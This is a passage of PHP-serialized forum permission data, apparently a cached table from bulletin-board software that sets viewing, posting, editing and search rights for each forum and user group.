\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"657\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"773\";s:3:\"fid\";s:2:\"45\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:18;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"809\";s:3:\"fid\";s:2:\"18\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:43;a:4:{i:5;a:18:{s:3:\"pid\";s:3:\"824\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"825\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"826\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"827\";s:3:\"fid\";s:2:\"43\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:51;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"51\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:69;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"69\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:52;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"52\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:53;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"53\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:67;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"67\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:68;a:1:{i:10;a:18:{s:3:\"pid\";s:3:\"813\";s:3:\"fid\";s:2:\"68\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}}i:31;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"436\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"437\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:5;a:18:{s:3:\"pid\";s:3:\"438\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:8;a:18:{s:3:\"pid\";s:3:\"439\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:10;a:18:{s:3:\"pid\";s:3:\"440\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:12;a:18:{s:3:\"pid\";s:3:\"441\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:13;a:18:{s:3:\"pid\";s:3:\"442\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:15;a:18:{s:3:\"pid\";s:3:\"443\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"655\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}i:21;a:18:{s:3:\"pid\";s:3:\"771\";s:3:\"fid\";s:2:\"31\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";}}i:28;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"101\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"102\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:5;a:18:{s:3:\"pid\";s:3:\"103\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"5\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:8;a:18:{s:3:\"pid\";s:3:\"104\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:1:\"8\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:10;a:18:{s:3:\"pid\";s:3:\"105\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"10\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:12;a:18:{s:3:\"pid\";s:3:\"190\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"12\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:13;a:18:{s:3:\"pid\";s:3:\"224\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"13\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:15;a:18:{s:3:\"pid\";s:3:\"295\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"15\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:17;a:18:{s:3:\"pid\";s:3:\"444\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"17\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"1\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";}i:20;a:18:{s:3:\"pid\";s:3:\"651\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"20\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:21;a:18:{s:3:\"pid\";s:3:\"767\";s:3:\"fid\";s:2:\"28\";s:3:\"gid\";s:2:\"21\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}}i:55;a:11:{i:1;a:18:{s:3:\"pid\";s:3:\"101\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";}i:2;a:18:{s:3:\"pid\";s:3:\"102\";s:3:\"fid\";s:2:\"55\";s:3:\"gid\";s:1:\"2\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:21:\"canonlyviewownthreads\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1